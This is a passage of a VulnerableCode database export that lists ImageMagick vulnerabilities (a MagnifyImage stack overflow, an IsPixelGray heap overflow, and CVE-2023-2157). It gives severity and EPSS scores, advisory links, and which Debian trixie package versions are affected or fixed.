vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2023-34474

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-rghj-fgdd-nke7

url VCID-rj9n-ra1t-77dy

vulnerability_id VCID-rj9n-ra1t-77dy

summary

ImageMagick has stack buffer overflow in MagnifyImage
MagnifyImage uses a fixed-size stack buffer. When using a specific image it is possible to overflow this buffer and corrupt the stack.

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-30929.json

reference_id

reference_type

scores

value	6.1
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-30929.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2026-30929

reference_id

reference_type

scores

value	0.00015
scoring_system	epss
scoring_elements	0.02791
published_at	2026-04-08T12:55:00Z

value	0.00015
scoring_system	epss
scoring_elements	0.02787
published_at	2026-04-07T12:55:00Z

value	0.00015
scoring_system	epss
scoring_elements	0.02779
published_at	2026-04-04T12:55:00Z

value	0.00015
scoring_system	epss
scoring_elements	0.02811
published_at	2026-04-09T12:55:00Z

value	0.00015
scoring_system	epss
scoring_elements	0.02764
published_at	2026-04-02T12:55:00Z

value	0.00017
scoring_system	epss
scoring_elements	0.03928
published_at	2026-04-12T12:55:00Z

value	0.00017
scoring_system	epss
scoring_elements	0.04026
published_at	2026-04-26T12:55:00Z

value	0.00017
scoring_system	epss
scoring_elements	0.04019
published_at	2026-04-24T12:55:00Z

value	0.00017
scoring_system	epss
scoring_elements	0.04009
published_at	2026-04-21T12:55:00Z

value	0.00017
scoring_system	epss
scoring_elements	0.03889
published_at	2026-04-18T12:55:00Z

value	0.00017
scoring_system	epss
scoring_elements	0.03878
published_at	2026-04-16T12:55:00Z

value	0.00017
scoring_system	epss
scoring_elements	0.03899
published_at	2026-04-13T12:55:00Z

value	0.00017
scoring_system	epss
scoring_elements	0.03945
published_at	2026-04-11T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2026-30929

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	8.6
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4

reference_id

reference_type

scores

value	7.7
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4

reference_url

https://github.com/ImageMagick/ImageMagick

reference_id

reference_type

scores

value	7.7
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/ImageMagick/ImageMagick

reference_url

https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-rqq8-jh93-f4vg

reference_id

reference_type

scores

value	7.7
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

value	HIGH
scoring_system	cvssv3.1_qr
scoring_elements

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-10T14:52:35Z/

url

https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-rqq8-jh93-f4vg

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2026-30929

reference_id

reference_type

scores

value	7.7
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2026-30929

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2445896
reference_id	2445896
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2445896

reference_url

https://github.com/advisories/GHSA-rqq8-jh93-f4vg

reference_id

GHSA-rqq8-jh93-f4vg

reference_type

scores

value	HIGH
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-rqq8-jh93-f4vg

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u7?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u7?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u7%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2026-30929, GHSA-rqq8-jh93-f4vg

risk_score 4.0

exploitability 0.5

weighted_severity 8.0

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-rj9n-ra1t-77dy

url VCID-s6bw-85wn-jygp

vulnerability_id VCID-s6bw-85wn-jygp

summary ImageMagick: Heap-buffer overflow in IsPixelGray in pixel-accessor.h (Incomplete fix for CVE-2016-9556)

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2016-9773.json

reference_id

reference_type

scores

value	3.3
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2016-9773.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2016-9773

reference_id

reference_type

scores

value	0.00472
scoring_system	epss
scoring_elements	0.64582
published_at	2026-04-01T12:55:00Z

value	0.00472
scoring_system	epss
scoring_elements	0.64636
published_at	2026-04-02T12:55:00Z

value	0.00472
scoring_system	epss
scoring_elements	0.64664
published_at	2026-04-04T12:55:00Z

value	0.00472
scoring_system	epss
scoring_elements	0.64622
published_at	2026-04-07T12:55:00Z

value	0.00472
scoring_system	epss
scoring_elements	0.6467
published_at	2026-04-08T12:55:00Z

value	0.00472
scoring_system	epss
scoring_elements	0.64686
published_at	2026-04-09T12:55:00Z

value	0.00472
scoring_system	epss
scoring_elements	0.64703
published_at	2026-04-11T12:55:00Z

value	0.00472
scoring_system	epss
scoring_elements	0.64691
published_at	2026-04-12T12:55:00Z

value	0.00472
scoring_system	epss
scoring_elements	0.64663
published_at	2026-04-13T12:55:00Z

value	0.00472
scoring_system	epss
scoring_elements	0.64699
published_at	2026-04-16T12:55:00Z

value	0.00472
scoring_system	epss
scoring_elements	0.6471
published_at	2026-04-18T12:55:00Z

value	0.00472
scoring_system	epss
scoring_elements	0.64697
published_at	2026-04-21T12:55:00Z

value	0.00472
scoring_system	epss
scoring_elements	0.64717
published_at	2026-04-24T12:55:00Z

value	0.00472
scoring_system	epss
scoring_elements	0.6473
published_at	2026-04-26T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2016-9773

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	4.3
scoring_system	cvssv2
scoring_elements	AV:N/AC:M/Au:N/C:N/I:N/A:P

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1401440
reference_id	1401440
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1401440

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2016-9773

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-s6bw-85wn-jygp

url VCID-t38m-c4zf-yqe6

vulnerability_id VCID-t38m-c4zf-yqe6

summary Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution.

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-2157.json

reference_id

reference_type

scores

value	5.5
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-2157.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2023-2157

reference_id

reference_type

scores

value	0.00038
scoring_system	epss
scoring_elements	0.11399
published_at	2026-04-02T12:55:00Z

value	0.00038
scoring_system	epss
scoring_elements	0.11221
published_at	2026-04-26T12:55:00Z

value	0.00038
scoring_system	epss
scoring_elements	0.11328
published_at	2026-04-13T12:55:00Z

value	0.00038
scoring_system	epss
scoring_elements	0.11191
published_at	2026-04-16T12:55:00Z

value	0.00038
scoring_system	epss
scoring_elements	0.11194
published_at	2026-04-18T12:55:00Z

value	0.00038
scoring_system	epss
scoring_elements	0.11322
published_at	2026-04-21T12:55:00Z

value	0.00038
scoring_system	epss
scoring_elements	0.11262
published_at	2026-04-24T12:55:00Z

value	0.00038
scoring_system	epss
scoring_elements	0.11457
published_at	2026-04-04T12:55:00Z

value	0.00038
scoring_system	epss
scoring_elements	0.11248
published_at	2026-04-07T12:55:00Z

value	0.00038
scoring_system	epss
scoring_elements	0.1133
published_at	2026-04-08T12:55:00Z

value	0.00038
scoring_system	epss
scoring_elements	0.11385
published_at	2026-04-09T12:55:00Z

value	0.00038
scoring_system	epss
scoring_elements	0.11391
published_at	2026-04-11T12:55:00Z

value	0.00038
scoring_system	epss
scoring_elements	0.11357
published_at	2026-04-12T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2023-2157

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	5.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1036476
reference_id	1036476
reference_type
scores
url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1036476

reference_url

https://bugzilla.redhat.com/show_bug.cgi?id=2208537

reference_id

2208537

reference_type

scores

value	5.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-07T21:30:33Z/

url

https://bugzilla.redhat.com/show_bug.cgi?id=2208537

reference_url

https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/45DUUXYMAEEAW55GSLAXN25VPKCRAIDA/

reference_id

45DUUXYMAEEAW55GSLAXN25VPKCRAIDA

reference_type

scores

value	5.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-07T21:30:33Z/

url

https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/45DUUXYMAEEAW55GSLAXN25VPKCRAIDA/

reference_url	https://security.gentoo.org/glsa/202405-02
reference_id	GLSA-202405-02
reference_type
scores
url	https://security.gentoo.org/glsa/202405-02

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

